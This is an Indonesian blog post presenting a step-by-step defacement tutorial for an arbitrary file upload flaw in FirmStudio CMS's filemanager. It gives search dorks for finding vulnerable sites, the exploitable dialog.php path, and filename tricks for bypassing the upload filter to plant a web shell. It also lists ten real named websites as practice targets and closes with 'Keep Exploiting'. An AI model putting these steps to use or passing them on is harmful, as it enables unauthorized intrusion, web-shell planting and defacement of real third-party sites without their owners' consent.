Rabu, 01 Juni 2016

Method Deface FirmStudio CMS (filemanager) Arbitrary File Upload

Sekitar 2.090 hasil (0,50 detik)
Lumayan lah website yang vuln dengan method ini, hehe..
gaisah basa basi lgi. simak baik" ye tutornya, lets cekidoot:
DORK :
- intext:"Website by FirmStudio"
- intext:"Website by FirmStudio" site:.de

EXPLOIT :
site.com/path/include/filemanager/dialog.php

CIRI-CIRI WEB VULN :

CARA UPLOAD SHELL :
- rename shellmu jadi:
1. shell.php.jpg
2. shell.php5
3. shell.php.png
4. shell.php.xxxjpg
5. kreasikan lagi ya, exstensi ini untuk mengbypass supaya bisa upload file.php, karena defaultnya  hanya menerima file .html .txt .gif
- Jika sudah di rename. Letak upload file ada sebelah kiri atas sebelah tulisan "Action"

SHELL AKSES :
site.com/uploaded_files/NAMA_SHELLMU
Kalo beruntung nih bisa dapet dir mayan lah, tapi kadang juga Not Writable smua, yg writable cuman file /temp/ doang. Caranya biar bisa akses tuh folder gunain method root server, bisa di googling :)
Buat belajar bisa gunaiin ini :
http://www.hiphing.com.hk/include/filemanager/dialog.php
http://www.cornes.hk/include/filemanager/dialog.php
http://www.jinchuan-intl.com/include/filemanager/dialog.php
http://www.starrhotels.com/include/filemanager/dialog.php
http://www.jewelryshows.org/include/filemanager/dialog.php
http://www.mhh.com.hk/include/filemanager/dialog.php
http://www.metrokitchen.com.hk/include/filemanager/dialog.php
http://www.alisan.com.hk/include/filemanager/dialog.php
http://www.cornesworld.com/include/filemanager/dialog.php
http://www.hairworks.com.hk/include/filemanager/dialog.php

Dah gitu aja ya, semoga bermanfaat :)
Keep Exploiting

Tidak ada komentar:

Posting Komentar